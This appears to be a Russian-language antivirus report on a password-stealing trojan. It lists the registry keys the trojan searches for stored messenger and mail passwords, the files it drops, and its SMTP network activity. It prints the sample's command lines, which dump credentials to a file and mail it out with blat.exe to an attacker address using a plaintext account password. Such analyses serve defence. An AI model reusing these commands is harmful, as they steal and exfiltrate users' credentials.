Техническая информация
Вредоносные функции
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами
- [HKCU\Software\Google\Google Talk\Accounts]
- [HKCU\Software\Microsoft\Internet Account Manager\Accounts]
- [HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts]
- [HKCU\Identities\{1BC91121-7903-48EE-BF78-1BC7CA4B5761}\Software\Microsoft\Internet Account Manager\Accounts]
- [HKCU\Identities\{1BC91121-7903-48EE-BF78-1BC7CA4B5761}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts]
- [HKCU\Software\Microsoft\MSNMessenger]
- [HKCU\Software\Yahoo\Pager]
- [HKCU\Software\Microsoft\IdentityCRL]
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\ixp000.tmp\bat.exe
- %TEMP%\ixp000.tmp\blat.exe
- %TEMP%\ixp000.tmp\msass.jpg
- %TEMP%\ixp000.tmp\blat.dll
- %TEMP%\bat.bat
- %TEMP%\exef20b.tmp
Сетевая активность
Подключается к
- 'sm##.#atamail.com':25
UDP
- DNS ASK sm##.#atamail.com
Другое
Создает и запускает на исполнение
- '%TEMP%\ixp000.tmp\bat.exe'
- '%TEMP%\ixp000.tmp\msass.jpg' /stext bb.txt
- '%TEMP%\ixp000.tmp\blat.exe' -install smtp.katamail.com pcontroller@katamail.com
- '%TEMP%\ixp000.tmp\blat.exe' bb.txt -to mirkoilsuperfigo@hotmail.it -u pcontroller@katamail.com -pw colombino
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\Bat.bat"" (со скрытым окном)
- '%TEMP%\ixp000.tmp\bat.exe' (со скрытым окном)
